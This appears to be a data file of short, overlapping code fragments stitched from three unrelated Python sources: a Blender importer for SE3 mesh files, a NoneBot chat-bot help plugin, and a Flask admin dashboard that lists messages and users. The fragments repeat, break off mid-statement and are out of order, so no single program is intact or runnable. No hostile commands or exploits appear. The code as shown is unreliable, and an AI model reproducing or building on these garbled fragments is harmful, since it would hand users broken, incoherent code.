"se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while processed_layers",
"layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open",
"get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces:",
"se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index",
"mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon =",
"uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data",
"filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = []",
"num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while processed_polys <",
"= file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type,",
"for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge",
"file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems = 0 while processed_elems < num_of_map_elems:",
"1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts",
"se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face",
"= se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data)",
"other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert",
"False last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers ==",
"#open polygons block processed_polys = 0 while processed_polys < num_of_polys: poly = []",
"= 0 is_last_pointer = False last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers <",
"except: data = (1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils import",
"= se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open",
"for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count",
"= 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close",
"tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0,",
"edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face",
"file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type",
"1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers",
"se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map:",
"0.0, 0.0), ( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active",
"= (edge[0], edge[1]) if which_edge == edge or which_edge == edge_rev: return False",
"processed_values < num_of_values: if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values +=",
"layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers += 1",
"0.0), ( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active =",
"= se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index =",
"se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) +",
"= 0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers",
"num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name()",
"== last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon block",
"se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps =",
"enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data def",
"= 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices",
"map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems",
"num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices <",
"= file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts:",
"file_query.get_num_of_values() processed_values = 0 is_last_value = False last_value_idx = num_of_values - 1 while",
"= layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif",
"for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if",
"se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces = []",
"= se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps:",
"se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if",
"edge_index_count = 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad =",
"processed_polys = 0 while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon",
"file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs =",
"uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = []",
"edge_not_in(which_edge, edges): for edge in edges: edge_rev = (edge[0], edge[1]) if which_edge ==",
"= num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative)",
"#open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl() #close",
"file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl()",
"obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys =",
"= file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index",
"se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index",
"elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close",
"se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for",
"+= 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps",
"= 0 num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps",
"get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges =",
"1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps +=",
"idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1]",
"for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index) for",
"Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0,",
"1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps +=",
"vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl()",
"layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0",
"#close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl()",
"num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index",
"1 faces = [real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices,",
"= file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps =",
"= [] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index =",
"= file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index = num_of_pointers - 1",
"0 while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open",
"for tessed_face in tessed_faces: fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face))",
"def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex):",
"fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face =",
"get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face,",
"= 0 num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name",
"file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while processed_polys < num_of_polys: poly =",
"= 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon",
"1 file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map",
"range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1])",
"== edge_rev: return False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data",
"map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map",
"= [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges):",
"is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces =",
"= file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type ==",
"tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge in edges: edge_rev",
"0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <=",
"for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count",
"se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials",
"= (1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils import (Matrix, Vector)",
"map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1",
"in edges: edge_rev = (edge[0], edge[1]) if which_edge == edge or which_edge ==",
"tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge in",
"read_file(operator, context): from mathutils import (Matrix, Vector) import math filepath = operator.filepath se3_mesh",
"num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index =",
"processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex maps",
"se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps: material =",
"= operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices",
"for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4",
"== se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps +=",
"uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index",
"vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl()",
"bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([]) for",
"polygons block processed_polys = 0 while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl()",
"+= 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices",
"#close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps"
"import to_me from nonebot.typing import T_State from nonebot.adapters import Bot, Event from .",
"to_me from nonebot.typing import T_State from nonebot.adapters import Bot, Event from . import",
"T_State from nonebot.adapters import Bot, Event from . import req, lang matcher_plugins =",
"lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot,",
"state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async",
"on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state:",
"import Bot, Event from . import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件',",
"async def main_plugins(bot: Bot, event: Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg)",
"on_command from nonebot.rule import to_me from nonebot.typing import T_State from nonebot.adapters import Bot,",
"from . import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle()",
"from nonebot.rule import to_me from nonebot.typing import T_State from nonebot.adapters import Bot, Event",
"on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event: Event, state: T_State): await matcher_basic.finish(lang.help_guide)",
"nonebot.typing import T_State from nonebot.adapters import Bot, Event from . import req, lang",
". import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async",
"from nonebot.typing import T_State from nonebot.adapters import Bot, Event from . import req,",
"priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state: T_State): msg = req.handle_plugins()",
"@matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state: T_State): msg = req.handle_plugins() await",
"Bot, event: Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic',",
"Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle()",
"msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot:",
"matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event: Event, state:",
"import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def",
"= on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event,",
"matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event:",
"await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event: Event,",
"from nonebot import on_command from nonebot.rule import to_me from nonebot.typing import T_State from",
"matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event: Event, state: T_State):",
"nonebot.rule import to_me from nonebot.typing import T_State from nonebot.adapters import Bot, Event from",
"import on_command from nonebot.rule import to_me from nonebot.typing import T_State from nonebot.adapters import",
"req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event:",
"Event from . import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1)",
"aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state: T_State):",
"T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def",
"nonebot import on_command from nonebot.rule import to_me from nonebot.typing import T_State from nonebot.adapters",
"<filename>src/plugins/basic/__init__.py from nonebot import on_command from nonebot.rule import to_me from nonebot.typing import T_State",
"main_plugins(bot: Bot, event: Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic =",
"event: Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4)",
"Bot, Event from . import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'},",
"nonebot.adapters import Bot, Event from . import req, lang matcher_plugins = on_command('plugins', aliases={'help',",
"req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot:",
"= req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot,",
"= on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event: Event, state: T_State): await",
"def main_plugins(bot: Bot, event: Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic",
"'插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state: T_State): msg",
"from nonebot.adapters import Bot, Event from . import req, lang matcher_plugins = on_command('plugins',",
"'帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state: T_State): msg =",
"import T_State from nonebot.adapters import Bot, Event from . import req, lang matcher_plugins"
"@app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html',",
"# current.append(task) # elif task.state == \"completed\": # completed.append(task) # else: # deleted.append(task)",
"#needs to be above all functions that use it??? def admin_login_required(f): @wraps(f) def",
"[optional-arg] # -*- coding: utf-8 -*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic",
"@app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for the user msgs, current_msg =",
"that use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None or",
"user_routes import * #needs to be above all functions that use it??? def",
"@admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return",
"return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title =",
"= db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title",
"render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title =",
"= sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list",
"@app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html',",
"user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all",
"None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return",
"#for task in tasks: # if task.state == \"current\": # current.append(task) # elif",
"@admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users,",
"user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get",
"@admin_login_required def dashboard_show_live_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return",
"dashboard(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() #if not",
"return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title =",
"String, MetaData, ForeignKey, Boolean ) from sqlalchemy import or_ #Modules from flask_app import",
"decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs)",
"render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the user msgs",
"msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for the user msgs =",
"title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users",
"from list from msg_routes import * from user_routes import * #needs to be",
"deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find",
"# elif task.state == \"completed\": # completed.append(task) # else: # deleted.append(task) #current =",
"#especially list_routes for find all from list from msg_routes import * from user_routes",
"import User, Msg import msg_routes, user_routes from functools import wraps #for some reason",
"title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users",
"render_template, request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import (",
"= get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted =",
"x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\")",
"= \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden():",
"# Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html')",
"db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users():",
"user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current,",
"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title = \"All Users\" return",
"current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted",
"return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all",
"redirect, render_template, request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import",
"session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table, Column, Integer,",
"@admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users,",
"@admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users,",
"= db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for",
